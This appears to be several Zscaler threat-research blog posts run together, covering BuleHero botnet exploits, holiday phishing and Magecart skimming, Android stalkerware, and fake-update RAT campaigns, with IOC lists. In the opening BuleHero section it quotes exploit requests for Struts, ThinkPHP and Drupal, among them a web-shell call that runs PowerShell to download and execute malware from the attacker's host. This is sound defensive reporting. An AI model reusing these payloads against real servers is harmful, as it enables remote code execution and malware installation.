(CVE-2017-5638) This vulnerability affects Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1. Apache Struts is a free and open-source framework used to build Java web applications. This particular vulnerability can be exploited if the attacker sends a crafted request to upload a file to a vulnerable server that uses a Jakarta-based plugin to process the upload request. The attacker can then send malicious code in the "Content-Type" header to execute the command on a vulnerable server. Fig 14: Crafting request to exploit Apache Struts vulnerability   Exploit::/struts2-rest-showcase/orders.xhtml Content-Type: %{(#nike='multipart/form-data')... Post.Open "GET","hxxp://fk.0xbdairolkoie[.]website/download.exe",0 >>.. Oracle WebLogic server vulnerability (CVE-2018-2628) This vulnerability allows an unauthenticated attacker with network access via the T3 protocol to compromise an Oracle WebLogic Server running on port 7001. The affected versions are 10.3.6.0, 12.1.3.0, 12.2.1.2, and 12.2.1.3 Fig 15: sending T3 handshaking request   Fig 16: sending payload to execute on server   WebLogic Deserialization RCE vulnerability (CVE-2019-2725) Oracle WebLogic Server is prone to a remote command-execution vulnerability due to deserializing input information. Specifically, this issue affects the "wls9_async" and "wls-wsat" components. An attacker can exploit this issue to execute arbitrary commands. The affected versions are 10.3.6.0.0 and 12.1.3.0.0.   Fig 17: Constructing malicious payload request   Exploit::port/wls-wsat/CoordinatorPortType OR :port/_async/AsyncResponseService Data: payload   Oracle WebLogic Server vulnerability (CVE-2017-10271) This vulnerability in the Oracle WebLogic Server component of WLS security allows an unauthenticated attacker with network access via the T3 protocol to compromise the server. The affected versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, and 12.2.1.2.0. Fig 18: Constructing malicious payload request   ThinkPHP v5 Remote Code Execution vulnerability The reason for this vulnerability is that the underlying layer of the ThinkPHP5 framework does not strictly filter the controller name, which allows an attacker to call sensitive functions inside the ThinkPHP framework through the URL, which leads to the download and installation malware. It tries to download and execute malware by running PowerShell from "cmd" due to this vulnerability. Fig 19: ThinkPHP vulnerability to download and execute malware   It tries to install hydra.php due to this vulnerability, and installs a web-shell that executes commands. Fig 20: ThinkPHP vulnerability to install malware by web-shell   It also installs hydra.php to launch PowerShell from "cmd," and downloads and execute the malware. Fig 21: ThinkPHP vulnerability to download and execute malware by hydra.php   Exploit:GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%http://20System.Net.WebClient).DownloadFile('http://fk.0xbdairolkoie[.]website/download.exe','C:/WebKit/2.250.20/12.exe');start%20C:/WebKit/2.250.20/12.exe   Drupal Remote Code Execution vulnerability (CVE-2018-7600) A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. It allows an attacker to inject a malicious payload into a form structure to execute arbitrary code. Fig 22: Construct a request payload to exploit Drupal vulnerability Exploit:URL : /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax Payload: form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail[#type]=markup&mail[#markup]= “malicious commands” Apache Solr Remote Code Execution vulnerability (CVE-2019-0193) This vulnerability exists in the DataImportHandler module, a common module used to import data from databases or other sources. The whole DIH configuration of this module can come from the dataConfig parameter included in an external request. As a DIH configuration can contain scripts, this parameter is a security risk. An attacker could exploit this vulnerability to cause arbitrary code execution via a malicious request that contains a carefully crafted dataConfig parameter. Affected versions: Apache Solr PHPStudy backdoor The BuleHero malware checks the below PHP module paths if it exists, then it replaces that module with the embedded backdoor, which allows an attacker to execute any command on the server. PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll This module is the same as those that were being spread by the PhpStudy official site when it was compromised. The purpose of these implanted backdoors was mainly for the remote code execution. Fig 24: Drop php_xmlrpc.dll if already exists   Other than making the infected system vulnerable, this malware targets the scanned IPs to download and execute the payload. Fig 25: Crafting a request with malicious payload   Exploit:URL: /index.php Accept-Encoding: gzip,deflate Accept-Charset:   Conclusion Inclusion of lateral propagation in any type of malware makes it more dangerous, as it can compromise an entire network. By including several exploits and methods for spreading across the network, the malware has multiple options which makes it more robust. We have been observing an increase in such malware since 2017. We advise users to keep systems updated with the latest operating system updates and security patches and to harden servers and endpoints. It's also important to update software security regularly to defend against such malware. Zscaler provides a layered security offering which protects against new and evolving malware, like the BuleHero botnet. The inclusion of Cloud IPS in the Zscaler platform protects customers against the exploits used in lateral propagation.   Zscaler protection Fig 26: Zscaler Sandbox report   IOCs: URLs: aa[.]0xbdairolkoie[.]space/xs.exe aa[.]0xbdairolkoie[.]space/swpuhostd.exe fk[.]0xbdairolkoie[.]space/download.exe xs[.]0x0x0x0x0[.]club:63145/cfg[.]ini qb[.]1c1c1c1c[.]best:63145/cfg[.]ini ce[.]1c1c1c1c[.]club:63145/cfg[.]ini jz[.]1c1c1c1c[.]xyz:63145/cfg[.]ini eq[.]s1s1s1s1s[.]asia:63145/cfg[.]ini rs[.]s1s1s1s1s[.]fun:63145/cfg[.]ini ik[.]s1s1s1s1s[.]host:63145/cfg[.]ini cu[.]s1s1s1s1s[.]pw:63145/cfg[.]ini ff[.]s1s1s1s1s[.]site:63145/cfg[.]ini aa[.]openyourass[.]icu/xs[.]exe fk[.]openyourass[.]icu/securitydnsservice[.]exe fk[.]openyourass[.]icu/download[.]exe ae86[.]decode0x[.]fun:63145/cfg[.]ini ae86[.]decode0x[.]host:63145/cfg[.]ini ae86[.]decode0x[.]icu:63145/cfg[.]ini ae86[.]decode0x[.]online:63145/cfg[.]ini ae86[.]decode0x[.]pw:63145/cfg[.]ini ae86[.]decode0x[.]site:63145/cfg[.]ini s4f5er4t5g1df23saadse[.]club:63145/cfg[.]ini ox[.]mygoodluck[.]best mi.oops[.]best:80 mx.oops[.]best:443 IPs: 172[.]104[.]91[.]191 139[.]162[.]2[.]123 185[.]147[.]34[.]106 185[.]147[.]34[.]136 Hashes: F864506F9797592321CF4C6A0BB5F199 (xs.exe) ECB3266326D77741815ECEBB18EE951A (swpuhostd.exe) 1B20076D8470AA308E24A2098786ECDD (svtink.exe) 398FB3FED9BE2941F3548A5D0D4B862C (vqbbqs.exe) EA774C81FE7B5D9708CAA278CF3F3C68 (vqfevffuz.exe) 1F2E820A81AE38E9E8DC173975AB57A6 (vfshost.exe) F89544ECBF66E93C2821625861AE8821 (AppCapture32.dll) B1956FE89E3D032BE3A06820C63F95A6 (AppCapture64.dll) FB82BA8BB7A402B05D06436991B10321 (ShellCode.ini) D464F1D389593B6DC285E64BC8B211AC (docmicfg.exe) 6612282F37F7CBDD2A962577FA49EF66 (schoedcl.exe) 22BB1452CA9BC4B8D346368D3F4DB6C2 (spoolsrv.exe) E4FF1EF997A3A1419F22938F83C91E45 (svschost.exe) 48442048EE3AB045FCB08809597E03B4 (vimpcsvc.exe) BD5AF8E9AFEA8D8173854F0A0C038B68 (SecurityDnsService.exe) 982C401A9D6F7016D910E8E60F17A0FB (AppCapture32.dll) 6E7E98549BAA186D3A0E3D1840B05ABF (AppCapture64.dll)    

We hope you enjoyed your own Black Friday and found everything you wanted as you were shopping the sales. The threat actors certainly attempted to take advantage of the zeal of holiday shoppers. As a follow-up to our previous blog on shopping scams, we’d like to show some of the other attacks we saw during the Thanksgiving break. We’ll highlight a few more phishing tactics commonly used, a Magecart POS skimmer attack on a major brand, and further evidence of Emotet’s prevalence in the overall threat landscape. The primary motivation of attackers is to take advantage of the online shopping season. Sales are already up for most retailers as consumers snap up deals. Fig 1: Shopping trends continued to rise through November (the spike at the end is Cyber Monday)   Scams and phishing attempts continue at a steady pace into the holiday shopping season. Attackers know that they can cast a wide net of branded phishing attacks, gift card scams, and malicious files to boost their profitability every year. Fig 2: Phishing attempts rose during the week before Thanksgiving and Black Friday   Magecart Magecart has been quite active so far. We have observed consistent hits in the weeks leading up to the holiday season and they persist. The chart below shows that Magecart infections are proving to be quite a sustainable means for attackers. Fig 3: Magecart activity tracked over two months (Oct-Nov 2019)   Recently, threat actors targeted the Macy's website. Macy's released a “Notice Of Data Breach” on November 14, 2019. The company stated that the site was compromised by attackers on October 7, 2019. The attackers had inserted an obfuscated version of a Magecart script to the Macy's Checkout and My Wallet pages. According to the breach notice, attackers were able to capture user credit card data. The user-submitted details were exfiltrated to a command-and-control (C&C) server at barn-x[.]com.   Phishing As we reported in the previous blog, Amazon has been heavily targeted this season, but it isn’t the only brand under attack. All major brands are considered fair game to threat actors. This season, Apple has become a focus of attackers. Below is one such case. Fig 4: Fake Apple login page One of the first things you should do before logging into sensitive websites is to check the address bar to ensure you are in the correct place. If you are unfortunate to enter your Apple ID into this portal, your information will be sent to the attackers. Fig 5: Information is sent in clear text to the attackers as well as any other attackers currently performing a man-in-the-middle (MitM) attack   After a phishing attack is successful, users get redirected to a message about their account being locked.   Fig 6: after entering Apple login information, the user receives a message from the attacker saying the account has been locked   Black Friday Phishing Black Friday offers aren’t just big in the U.S.—the start of the shopping season is celebrated all around the world. The image below shows a phishing page claiming to offer Black Friday deals from Americanas.com.br, a major Brazilian retail chain. Notice the domain: the entire content is hosted on Joomla. A legitimate vendor would never host its products via a content management/publishing framework. Fig 7: Faked Americanas site being hosted on Joomla The screen below is another example of threat actors targeting users via a fake Americanas.com.br site. As of the writing of this blog, the domain hosting this page was only five days old. Fig 8: Faked Americanas site on a newly registered domain   Emotet In our previous blog, we discussed how webmail was a critical element in Emotet infection downloads. Another attack vector favored by threat actors is leveraging compromised WordPress sites—specifically, SSL-secured WordPress sites. Attackers assume (correctly, in many cases) that consumers don’t have a security solution that inspects encrypted traffic (HTTPS). In fact, when you look at the last 1,000 confirmed Emotet samples on URLhaus, 475 of them at the time of this research were using HTTPS to infect users. Fig 9: HTTPS is the primary method of infection   Conclusion The Zscaler ThreatLabZ team will continue to track and block various campaigns and tools used by threat actors. We work diligently to protect our customers from these malicious attacks. Users should be cautious and protect themselves, particularly during the shopping season, by reviewing our security checklist: Change your passwords for critical and important accounts Enable two-factor authentication, or “2FA” Ensure HTTPS is inspected by your security solution; check for HTTPS/secure connections when visiting shopping/e-commerce/financial websites Be vigilant about invoices/orders arriving in email; do not forward such attachments to anyone and be sure to follow IT protocol Be vary of tracking number links in emails from shipping/courier companies, as they may direct you malicious sites Do not click on any links from unrecognized senders; even if you do not follow through, the action of clicking the URL is a beacon for the attacker Do not provide any credentials via Google docs; legitimate vendors do not ask for credentials via this medium Avoid using public or unsecured Wi-Fi connections for shopping Review helpful instructions by the Federal Trade Commission (FTC) on Identify Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message Report incidents to the FTC  

Recently, the U.S. Department of Homeland Security (DHS) released an article warning mobile users about the increasing use of spyware apps.  The US-CERT (Computer Emergency Response Team) issued the following statement:     The statement was released just after the Federal Trade Commission (FTC) marked its first case against stalking apps (also known as stalkerware or spyware apps). A case was filed against a company that developed and distributed stalking apps that could track smartphone activities like call history, text messages, photos, locations, browser history, and more. These apps were marketed as apps for monitoring the location and activities of children, employees, or spouses. According to the FTC's complaint, the company did not take steps to ensure that purchasers were using the apps for legitimate purposes. During the timeframe when the US-CERT released its statement, we noticed some hits on the Zscaler cloud in relation to spyware activities. We frequently detect the presence of spyware apps such as Spymie, TruthSpy, iSpyoo, GuestSpy, Spynote, NeoSpy, among others, on the Zscaler cloud, but we also found some new actors in this period. In this blog, we will briefly discuss these new spyware apps. The blog is divided into three parts. First, we discuss typical stalkerware functionalities, then we'll explore some of the different types of spyware apps we've seen in the last few months, and in the final part we'll cover the indicators of compromise (IOCs). Stalkerware (stalking apps or spyware), as the name suggests, is a type of app that spies on victims. Stalkerware apps are capable of, but not limited to, performing the following functions:   Stealing contacts Spying on text messages Stealing photos Spying on browsing history Spying on banking apps Stealing GPS locations Normally, one is required to have physical access to a mobile device in order to install spyware apps, but an attacker can use social engineering tactics to get the victim to install spyware.  Once installed, the typical spyware app will typically gain admin-level access, hide itself, spy on the victim, and, finally, send the stolen data to the attacker.  The following is an abstract about some spyware apps we found on the Zscaler cloud.    Android Monitors Package Name: com.ibm.fb Hash : 97c6c8b961d57d4ebad47f5c63ec6446 We saw multiple entries of spyware apps dubbed Android Monitors. Upon looking at the icon, we believe it is in its development phase. Once installed, it cleverly safeguards itself from Google's security framework, Play Protect.     Fig 1: Android Monitor initial setup   The screenshot below shows the functionality of the app's keylogger. If enabled, this app can spy on everything that the victim types, which can include personal WhatsApp messages, Facebook chats, emails, banking activities, and much more.   Fig 2: Android Monitor keylogging   The above screenshot also has an email ID column to which all the stolen data is sent. The Zscaler analytical system precisely detects this spyware. The following screenshot highlights the main functionalities of the app. Fig 3: Zscaler Cloud Sandbox with Android Monitor sample   Russ City Package Name: city.russ.alltrackercorp Hash: 3b388138584ad3168e745097d5aa4206 This spyware app portrays itself as Thief Tracker. Further hunting for similar samples from the same source, we found two more apps, named System Info and System Updater. Upon analysis, we noticed that all three apps were the same; their only difference was their names.  The screenshot below shows how the three spyware apps appeared upon installation: Fig 4: Spyware app icons   The complete functionality of this spyware can be seen in its manifest file, below. Fig 5: AndroidManifest.xml    This app performs various background services: Read text messages Get browser history Fetch call logs Get GPS location Get clicked photos Record audio Record voice calls Capture screenshots   Fig 6: Android services   Spy Phone App  Package Name: com.spappm_mondow.alarm Hash : 001209b1e2760f88f2bb4b68f159a473 This app was delivered via Google Drive and contained almost all possible spyware functionalities, as shown in the screenshot below: Fig 7: Zscaler Sandbox displaying Spy Phone analysis   We found its platform online where the attacker can log in and check all the stolen data stored in this one place.  Fig 8: Spy Phone App control panel   Wi-Fi Settings Package Name: com.wifiset.service Hash : 8dab7a558f91e72e3edae8e20ee55c86 This stalkerware portrays itself as a settings app for Wi-Fi. One unique feature of this app is its method for staying persistent. During the installation process, it installs an additional app named Update Settings.  The screenshot below shows this functionality in action. Fig 9: Initial installation steps Once the initial setup is done, the attacker can enter his/her credentials and leave the rest on spyware. As soon as the spyware gets an internet connection, it starts sending the stolen data to a command & control (C&C) center/server. We noticed a major flaw with this spyware. It sends all the stolen data over plain-text (HTTP), which compromises the victim's data at the secondary level. As shown in the following screenshot, the user credentials are sent in plain text:   Fig 10: Plain text communication The screenshot below shows stolen photos being uploaded to the C&C server with basic Base64 encoding. Fig 11: Spyware uploading photos from the victim's device   Data Controller  Package Name: lookOut.Secure Hash : 33dcfd84589c6ccf00fa5a302cefd0fe This app portrays itself as Data Controller and has the package name lookout.Secure. It is strange to see a  package called Lookout, as a legitimate company called Lookout is a highly regarded mobile security company. The attacker might have used this package name in order to trick users into trusting the app. Once installed, it asks for the purpose of use and whether the attacker wants to keep it hidden from the victim or not. (Spyware always prefers to hide itself to evade detection.)   Fig 12: Initial installation steps The Zscaler Cloud Sandbox report shows the major spying capabilities in this spyware: Fig 13: Sandbox report of the Data Controller app   Auto Forward  Package Name: com.autoforward.monitor Hash: 66dbd2d7614555440b657ae24527034a It's common for spyware apps to portray themselves as parental-control apps. This is the case with Auto Forward spyware. As soon as the spyware is installed, it displays itself as an app named Device. It asks for all available permissions necessary to spy, as shown in the screenshot below:    Fig 14: Initial installation steps On its official website, Auto Forward assures users that the spyware works on both Android and iOS platforms. Once installed, it steals the personal data of the victim and forwards it to its server, where the attacker can easily view stolen data such as text messages, WhatsApp activities, GPS locations, photos, a list of installed apps, and so on.    Conclusion Spyware apps often portray themselves as parental-control apps or apps that can monitor employee whereabouts or the activities of a spouse suspected of cheating. Although there are legitimate uses, such as parents monitoring their children's location, these types of apps are often used maliciously.  Most of the spyware in this report were not properly designed. They store stolen data on a server without any security, which creates a single point of failure. Worse, a single instance of compromise can leak every victim's data into the wild.  Secondly, we observed the stolen data being transferred to C&C servers over plain-text channels, which can be compromised by man-in-the-middle attacks.  These flaws would not be acceptable with any legitimate app because they threaten the privacy of the users, potentially revealing their personally identifiable information (PII), which is obviously not a concern to the attackers. Smartphone users who suspect their privacy may have been compromised by such apps can consider following these steps:  Use a legitimate antivirus app that is regularly updated Try factory-resetting your device Remove suspicious apps from device administrator list   ( settings --> security --> device administrators)  Zscaler customers are protected from stalkerware apps.     IOCs  Hash 97c6c8b961d57d4ebad47f5c63ec6446 b0e68b66a5ba47612f2a6a33b343503b 93e969ea1118a9d00be7f1c74b50fce9 b44a98af29b021ad5df4ac6cc38fecf5 d4ecbf666d17326deab49f75588e08b3 9eaf38020f898073af1a3ce34226c91f ea1546f34a6cd517dcfec07861b7fb4f 5fbb1b497c5a86815e5e8cc092d09af0 10322c7dea57269d69a85699e0357f5f 3b388138584ad3168e745097d5aa4206 369a17a8e1031101f41cc31caac56b9c ba63ae94bdec93abc144f3b628d151ad 8dab7a558f91e72e3edae8e20ee55c86 001209b1e2760f88f2bb4b68f159a473 33dcfd84589c6ccf00fa5a302cefd0fe 66dbd2d7614555440b657ae24527034a URLs russ[.]city/apks/alltracker_thief_v.6.5.2.apk russ[.]city/apks/systeminfo_v.6.5.2.apk russ[.]city/apks/systemupdater_v.6.5.2.apk 206.41.116[.]121 dwn[.]vys.me            

A few weeks ago, the witches and skeletons that decorated shop windows for Halloween were swept aside and replaced with reindeer and jolly elves. Fir trees supplanted the pumpkins and “Jingle Bells” began drifting from speakers buried under mounts of artificial snow. It all means one thing: the start of the holiday shopping season, which kicks into high gear on Black Friday. Cyber Monday, which began in 2005, has surpassed Black Friday as the biggest shopping day of the year and, not surprisingly, it has become a major target for cybercrime. But in a report our ThreatLabZ researchers did last year, we were somewhat surprised to see the shifting volumes of activity, which spiked a week before Cyber Monday and dropped off significantly on the day itself. We saw this as an example of the increasing sophistication of attack campaigns, as those carrying them out had begun to mirror the strategies of retail marketers. The Zscaler cloud processes about 75 billion transactions a day for our enterprise customers, and though the bulk of the traffic is business-related, the sheer volume gives us a sweeping view of activity across the internet. Since the beginning of November, we have seen a marked increase in what we identify as shopping traffic. We are also seeing activity that could foreshadow a busy holiday season for cybercriminals. This activity includes phishing that’s targeting well-known shopping brands, phishing attacks targeting mobile phones, site skimmers looking to harvest credentials from compromised e-stores, scam sites offering gift cards, and banking Trojans trying to turn your PC or mobile device into an ATM. Figure 1: Shopping traffic on the Zscaler cloud between Oct. 21 and Nov. 17, 2019, averaging nearly 600 million transactions per weekday Phishing activity tends to rise when the shopping season begins, as attackers know that shoppers may be more likely to respond to “special offers” or notifications relating to shipping and similar matters. Threat actors adjust their phishing kits accordingly, sometimes with seasonal messages and designs. We calculated an increase of more than 400 percent in phishing activity between the first 14 days of October and the first 13 days of November. Figure 2: Phishing activity between Oct. 2 and Oct. 14, 2019   Figure 3: Phishing activity between Nov. 2 and Nov. 14, 2019   Three cases of phishing attacks on shoppers Because Amazon is by far the busiest shopping site, it has the highest likelihood of being on the radar of scammers looking to attack a broad audience. Below, we'll discuss some of the ways that attackers are leveraging Amazon’s popularity for their own money-making schemes.   Case 1: Fake Amazon Gift Cards Everyone loves giving and receiving gift cards, but the phony versions being generated by scammers are dangerous. If you were to click the link (as shown below), you would be redirected to a phishing page that will attempt to collect your login credentials. The following scam arrives via email, congratulating the recipient for qualifying to receive a reward for taking an anonymous survey—but, it says, it must be done in five minutes.   Figure 4: Phishing attempt Figure 4a: HTML of the page shows the attempt to pose as an Amazon Gift Card   Case 2: Fake Amazon Login A common way that attackers try to compromise your Amazon account is through the use of an email or site posing as a legitimate Amazon site. Be wary of any emails posing as Amazon Customer Service alerts or payment invoices as these are common hooks attackers will use to appear legitimate and get victims to click their links. ThreatLabZ has been monitoring one campaign that was sending PDF or DOC files to victims in the hopes they would click through and enter their credentials (see the image below). Figure 5: Letter impersonating Amazon in an attempt to capture user credentials   By clicking the link in the letter, you would be redirected through several URL shorteners before eventually landing on a compromised site hosting an “Amazon” phishing kit. The site was down at the time of this publication, but the screenshot from early on in the campaign shows a near-perfect copy of an Amazon login screen that is set up to steal credentials. Figure 6: Faked Amazon login screen   Case 3: Emotet Trojan A popular method that attackers use to target victims is through the use of scam emails or URLs that pretend to be legitimate purchase orders or invoices; these may appear as links or attachments. This has become a common method for distributing one of the most prevalent banking trojans out there, Emotet. The following case actually comes from the site: http://phamthaifood[.]com/4ib60l/Amazon/Orders-details/10_19/. Opening this document in a secured environment still asks the user to enable editing to allow the attack to commence. Figure 7: Allowing active content of suspicious files is not recommended An analysis of the document in question provides a glimpse into the PowerShell that will execute on the victim's system. Figure 7a:  Malicious PowerShell   The PowerShell mentioned above will download and execute the Emotet trojan. Running this through a dynamic analysis will reveal a malicious attack. Figure 7b: Threat score of Emotet as identified by Zscaler Cloud Sandbox   Once the document is opened, it will execute encrypted PowerShell commands to install the banking trojan onto the victim’s system. We've written extensively about the resurgence of the Emotet malware in earlier blogs.   PayPal Phishing In addition to shopping sites, banking and personal finance sites, such as PayPal, become frequent targets during the holidays. PayPal is one of the most accepted secure payment options used by vendors. Threat actors know this and use it as another primary target for phishing attacks. Some of these attacks are easy to recognize (as shown below) because they are served over non-secure connections using HTTP, which is always a tell-tale sign of a phishing attempt. Figure 8: Faked PayPal login screen   Some attacks, on the other hand, can be quite elaborate, as shown below. They are served over an HTTPS connection and the interface presents a very good reproduction of the official PayPal site. The domain name (paypal.com.hrmy.mtbank[.]shnpoc[.]net) could easily be missed because many people believe that as long as they see “paypal.com,” the site is legitimate. Particularly when viewed on a mobile device, it would be difficult to see that the URL does not belong to PayPal, but “shnpoc.net.” Figure 9: Faked PayPal login screen   The example below appears to be a PayPal site that enables you to sign up for a personal or business account, or even recover your password. But any personal and financial information you enter will be captured by the scammers. Figure 10: Faked PayPal registration screen   Smishing Campaign Many consumers are seeing an increase in order and delivery messages on their mobile devices. Scammers use this opportunity to lure users into revealing personal information through SMS phishing (“smishing”) techniques. With Smishing, attackers send an SMS message to mobile users containing live links that, when clicked, redirect the user to phishing pages and result in credential theft and can lead to financial theft. In the example shown below, we saw SMS messages notifying the user of an online order with a link to follow for more details. Figure 11: Smishing attempt   Once clicked, the user is redirected to cyzoone(.)xyz. This site poses as a poll site to lure victims into entering to win up to $35,000. To take part in the poll, victims have to register using their names.   Figure 12: Smishing attempt using a survey with cash prize   Upon clicking the PARTICIPATE button, the site begins asking poll questions. The questions we observed were about cars, perfumes, and watches, among other things, and can be observed in the following screenshots. Figure 13: Smishing attempt using a survey with cash prize   Once finished with the poll questions, the screen shows the amount that the victim has “won.” Now that the user is fully invested in this deception, the scam starts. The attacker claims, due to payment system limits, that the payment will be sent in two parts. But, to get that amount in full, the user has to pay  $35, as shown in the following screenshot. Figure 14: Scam message saying if you pay $35, you will receive $26,600 Upon clicking the payment button, the scam redirects to a payment page hosted on paybank(.)expert asking the user for a credit card number, CVV number, and the expiration date of the card. Figure 15: Payment screen as part of a smishing scam   After filling out the form and clicking the Pay Now button, the payment information will be sent to the attacker’s site, as shown in the below screenshot. This gives the attackers access to the victim’s account. Figure 16: Scammer’s site   We also checked on the stats of the bit.ly link included in the original SMS message and observed that there were more than half a million clicks on this link in a 24-hour period, which shows the widespread reach of this scam. Figure 17: Clicks on the scammer’s original smishing message   Magecart: Site skimmer Magecart has been active for five years and has been successful injecting JavaScript into target websites to skim for payment information from point-of-sale portals. The injected script can be loaded directly onto the target page or loaded from a remote resource controlled by the attacker. The attack script may be injected in plain text (as shown below) or obfuscated to avoid detection. Figure 18: E-commerce site compromised by Magecart   Magecart malware is capable of tracking cookies to check what data is stored and what data is sent. It also checks for the validity of the payment details entered by a user. If the payment details are valid, the malware proceeds to send the information to the attacker. This attack is smart enough to check for old card details and sends only new information to the attacker. For more detailed insight into the mechanics of Magecart, please check out our analysis here.   Figure 19: Magecart skimmer    Conclusion The ThreatLabZ team at Zscaler will continue to track and block various campaigns and tools used by threat actors to target users. We work diligently to protect our customers from these malicious attacks. Users should be cautious and protect themselves by reviewing our security checklist, particularly during the shopping season: Verify the authenticity of the URL or website before accessing it. Be wary of links with typos. Check for HTTPS/secure connections when visiting shopping/e-commerce/financial websites. All legitimate vendors/retailers and payment portals use HTTPS connections for their transactions. Enable two-factor authentication, or “2FA,” to provide an additional layer of security, especially for sensitive accounts related to financial transactions. As a rule of thumb, don't click links or open documents from unknown parties who promise exciting offers and opportunities. Avoid visiting URL shortener links. Always ensure that your operating system and web browser are up to date and have the latest security patches installed. Use a browser add-on, such as Adblock Plus, to block malvertising (compromised/malicious website bombard visitors with pop-up ads). Only download apps from official app stores, such as Google or Apple. Avoid using public or unsecured Wi-Fi connections for shopping. Back up your documents and media files. You can always go the extra mile by encrypting your files. Review helpful instructions by the Federal Trade Commission (FTC) on Identify Theft, Recognizing and Avoiding Phishing Scams, and Understanding Mobile Apps and Malware. Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message. Report incidents to the FTC.      

Recently, the Zscaler ThreatLabZ team came across two campaigns designed to trick users into downloading a Remote Access Trojan (RAT) via a fake Flash Player update and a font update. These campaigns are designed to inject malicious redirector scripts into compromised content management system (CMS) sites. These sites use popular programs, such as WordPress, Joomla, Drupal, and others, and are being attacked as a result of vulnerabilities introduced by plugins, themes, and extensions, something we’ve discussed previously on this blog. The two malware campaigns we examine in this blog deliver a payload designed to steal sensitive information. The following figure depicts the hits on the various compromised sites. Overall, Zscaler has blocked nearly 40,000 of these attempts in the past three months. Figure 1: The number of hits on the various types of compromised CMS sites: WordPress (green), Joomla (gold), Drupal (blue), and other CMS sites (orange) Method 1: Fake Flash Player update campaign In this attack, cybercriminals hacked WordPress sites using the theme plugin vulnerability and injected two malicious redirect scripts in the compromised site. By using either one of the scripts, the attackers will deploy malware at the user’s end. The injected script will redirect to the malware site and download the fake update template script to show a fake Flash Player update alert to the user over the compromised site. Figure 2: A compromised WordPress site with the fake Flash Player update page   The following figure shows the source code of the compromised website with the injected scripts. Figure 3: The injected redirector scripts in a compromised CMS site   The first injected script will direct the user to click.clickanalytics208[.]com to download the fake update template. If it fails to meet the attacker's checkpoints, such as geolocation and network settings, then it will execute the next injected script. Figure 4: The first injected malicious script redirects to the click.clickanalytics208[.]com site   The second injected script will redirect to the chrom-update[.]online site and will download the fake update template script from the malicious site. Figure 5: The second injected malicious script redirects to the chrom-update[.]online site   The attacker will send the template.js file as a layer of the compromised site with a fake update page. The fake update page template will be displayed based on the particular variable’s value, also called a “banner.” Figure 6: The default template.js code [banner value = 1: browser update; 2: font; 3: Flash]   The fake template page will display an alert to try to trick the user into starting the update. Once the user clicks the "Update" button, the script downloads the malicious HTA file from the specified URL.  Figure 7: A fake Flash Player update page with the link to download malicious HTA file   If the user clicks the "Later" button, the redirect still occurs, taking the user to the same page to download the malicious HTA file. The following figure depicts the source code of the template.js with the link to download the malicious HTA file with the banner value 3. Figure 8: The source code of the template.js script from the redirection URL (chrome-update[.]online)   Once the user runs the HTA file, it will also run the PowerShell application using the command prompt and download the RAT payload from the specified URL. Figure 9: The source code of the downloaded malicious HTA file   Figure 10: The obfuscated content responsible for the malware download   Figure 11: The deobfuscated code showing the download link   Figure 12: Step 1 of the malware payload installation process   Figure 13: Step 2 of the malware payload installation process   Figure 14: The NetSupport RAT malware running as a client-side application   Finally, the installed RAT malware will send the victim's information in an encrypted format to the attacker’s site (hxxp://179.43.146[.]90/fakeurl.htm) to enable remote access of the victim’s machine, as shown in Figure 15 below. Figure 15: The captured user data is transferred to the attacker’s site in an encrypted format Figure 16: The overall traffic of the fake Flash Player update malware campaign   The attackers were also tracking the visitor count, as shown in Figure 17 below. So far, 113,000 unique users were affected by this malware attack. Figure 17: The affected user count   Method 2: Fake font update campaign In this attack, the cybercriminals will directly inject the fake update template script by exploiting the legitimate site to evade detection. As mentioned earlier, the template script logic will identify which browser is being used. While accessing the compromised site via Chrome, the user will receive an alert that the “PT Sans” font wasn’t found.   Figure 18: The compromised site with a fake font update page (Chrome)   The same site was accessed via Firefox and shows the same alert to the user in the Firefox template. Figure 19: A compromised site with a fake font update page (Firefox)   The following image shows the source code of the compromised site with the injected template script.   Figure 20: The template.js is injected directly into the compromised site   The source code of the template.js script shows a banner value “2” and has a link (sreex[.]info/update.exe) to download the malware payload. Figure 21: The source code of the template.js script with the malware download link   Figure 22: After clicking the update button, the malware payload will be downloaded (via update.exe)   The following activities were observed while executing the downloaded Trojan. Figure 23: The program created a process “gdsun.exe”  from the malware payload (a self-copy of the payload)   Figure 24: The malware creates a copy of the payload in the %ProgramData%/ folder   Figure 25: It also creates a startup registry entry for the dropped malware   It will post the following collected user data to (clickies(.)site/CC/index(.)php), which is operated by the attackers. Figure 26: Post-infection callback traffic   Figure 27: The overall traffic of the fake font update campaign   Conclusion In today's digital world, a company's website is its most valuable asset. Therefore, it is critically important for companies to protect this public face from an attack that could put your business, employees, and your customers at risk. Zscaler has blocked more than 40,000 malicious attacks related to this campaign in the past three months. Figure 28: The Zscaler Risk Analyzer score for the malware payload download URL   IOCs URLs: click.clickanalytics208(.)com chrom-update(.)online asasasqwqq(.)xyz bitbucket(.)org/execuseme1/1312/downloads/download.hta xyxyxyxyxy(.)xyz/wwwwqwe/11223344.exe 179(.)43(.)146(.)90/fakeurl(.)htm sygicstyle(.)xyz sreex(.)info/update(.)exe clickies(.)site/CC/index(.)php   Malware payload: 5ad69da64dacdf87c5bdea12a20ca8fd4d34e6a16c37dfbb9a2af8df79901504(download.hta) 9c69a1d81133bc9d87f28856245fbd95bd0853a3cfd92dc3ed485b395e5f1ba0(11223344.exe) ea137c0079624de8d2f8b174d44f90faa58c4eda558f7d5db0efa742f36c2cdf(update.exe)  

